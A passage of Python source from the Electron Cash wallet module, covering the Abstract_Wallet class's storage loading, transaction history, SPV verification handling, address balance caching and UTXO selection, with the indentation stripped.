raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
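# Minimal sketch of how sweep() sizes its fee when fee=None (a restatement of
# the two-pass logic above, not extra behavior): a throwaway tx spending
# `total` is built only to measure serialized size, then the real tx is
# rebuilt with that size-based fee subtracted:
#   fee = config.estimate_fee(Transaction.from_io(
#             inputs, [(TYPE_ADDRESS, recipient, total)]).estimated_size())
#   outputs = [(TYPE_ADDRESS, recipient, total - fee)]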
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(1) on average rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
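# A round trip through these two classmethods preserves the mapping
# (illustrative sketch; `addr_str` is a hypothetical storage-format address):
#   d = cls.to_Address_dict({addr_str: [('txid', 1)]})
#   cls.from_Address_dict(d) == {addr_str: [('txid', 1)]}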
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = saved_der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets, which may add/delete addresses,
so the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do two O(1) set membership tests rather than two O(N) lookups
# against the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up since is_mine() is called frequently,
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
self._update_request_statuses_touched_by_tx(tx_hash)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
for tx_hash in txs:
self._update_request_statuses_touched_by_tx(tx_hash)
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_hash(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
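# Worked examples of the sort key above (hypothetical heights):
#   verified at height 1000, pos 5     -> (1000, 5)
#   unverified, server says height 900 -> (900, 0)
#   unconfirmed (height <= 0)          -> (1e9 - height, 0)  # sorts after confirmed
#   unknown tx                         -> (1e9 + 1, 0)       # sorts last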
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
"""Effect of tx on address."""
assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
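# Worked example (hypothetical values): if this address funded one 5000-sat
# input of the tx and received one 1500-sat output back as change, then
#   get_tx_delta(tx_hash, address) == -5000 + 1500 == -3500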
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
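# Semantics of the tuple built above, for the common all-inputs-mine case
# (hypothetical values): spending 10000 sats of our coins into a 6000-sat
# external output plus 3700-sat change back to us gives
#   v   == v_out_mine - v_in == 3700 - 10000 == -6300
#   fee == v_in - v_out      == 10000 - 9700 == 300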
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status = _('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
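# Shapes returned above (txids/heights are placeholders):
#   received -> {'<txid>:<n>': (height, value, is_coinbase), ...}  # outpoints paying the address
#   sent     -> {'<txid>:<n>': height, ...}                        # outpoints spent from the address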
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
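# Worked example of the (c, u, x) tuple computed above (hypothetical values):
# an address holding a 2000-sat confirmed coin, a 500-sat mempool coin, and a
# 5000-sat coinbase coin still maturing returns
#   get_addr_balance(addr) == (2000, 500, 5000)
# i.e. (confirmed_matured, unconfirmed, unmatured).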
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if isInvoice:
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
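# The maturity test above, restated (assuming the usual COINBASE_MATURITY of
# 100): a coinbase coin mined at height H becomes spendable once
#   mempoolHeight - H >= COINBASE_MATURITY, i.e. chain tip height >= H + 99.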
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
